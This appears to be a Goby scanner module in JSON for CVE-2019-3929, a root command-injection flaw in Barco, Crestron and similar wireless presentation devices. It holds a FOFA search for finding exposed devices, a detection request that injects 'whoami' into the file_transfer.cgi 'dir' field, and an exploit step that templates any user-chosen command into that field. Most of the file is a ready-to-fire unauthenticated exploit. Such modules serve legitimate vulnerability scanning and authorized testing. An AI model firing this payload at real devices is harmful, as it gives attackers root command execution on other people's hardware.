Goby/json/Barco-AWIND-OEM-Presentatio...

95 lines
3.2 KiB
JSON

{
"Name": "Barco/AWIND OEM Presentation Platform Unauthenticated Remote Command Injection (CVE-2019-3929)",
"Description": "The Crestron AM-100 firmware 1.6.0.2, Crestron AM-101 firmware 2.7.0.1, Barco wePresent WiPG-1000P firmware 2.3.0.10, Barco wePresent WiPG-1600W before firmware 2.4.1.19, Extron ShareLink 200/250 firmware 2.0.3.4, Teq AV IT WIPS710 firmware 1.1.0.7, SHARP PN-L703WA firmware 1.4.2.3, Optoma WPS-Pro firmware 1.0.0.5, Blackbox HD WPS firmware 1.0.0.5, InFocus LiteShow3 firmware 1.0.16, and InFocus LiteShow4 2.0.0.7 are vulnerable to command injection via the file_transfer.cgi HTTP endpoint. A remote, unauthenticated attacker can use this vulnerability to execute operating system commands as root.",
"Product": "Crestron-AM-100",
"Homepage": "https://www.crestron.com/Products/Workspace-Solutions/Wireless-Presentation-Solutions/AirMedia-Presentation-Gateways/AM-100",
"DisclosureDate": "2019-04-30",
"Author": "itardc@163.com",
"FofaQuery": "body=\"AwLoginDownload.html\" || title=\"Crestron AirMedia\" || title=\"wePresent\" || body=\"LiteShow\"",
"GobyQuery": "",
"Level": "3",
"Impact": "",
"Recommendation": "",
"References": [
"http://packetstormsecurity.com/files/152715/Barco-AWIND-OEM-Presentation-Platform-Unauthenticated-Remote-Command-Injection.html",
"http://packetstormsecurity.com/files/155948/Barco-WePresent-file_transfer.cgi-Command-Injection.html",
"https://www.exploit-db.com/exploits/46786/",
"https://www.tenable.com/security/research/tra-2019-20",
"https://nvd.nist.gov/vuln/detail/CVE-2019-3929",
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3929"
],
"HasExp": true,
"ExpParams": [
{
"name": "cmd",
"type": "input",
"value": "whoami",
"show": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/cgi-bin/file_transfer.cgi",
"follow_redirect": true,
"header": {"Content-Type": "application/x-www-form-urlencoded"},
"data_type": "text",
"data": "file_transfer=new&dir=%27Pa_NotewhoamiPa_Note%27"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "regex",
"value": "^root\\s$",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/cgi-bin/file_transfer.cgi",
"follow_redirect": true,
"header": {"Content-Type": "application/x-www-form-urlencoded"},
"data_type": "text",
"data": "file_transfer=new&dir=%27Pa_Note{{{cmd}}}Pa_Note%27"
},
"SetVariable": ["output|lastbody"]
}
],
"Tags": ["rce"],
"CVEIDs": [
"CVE-2019-3929"
],
"CVSSScore": "9.8",
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": ["Crestron-AM-100"]
},
"Disable": false
}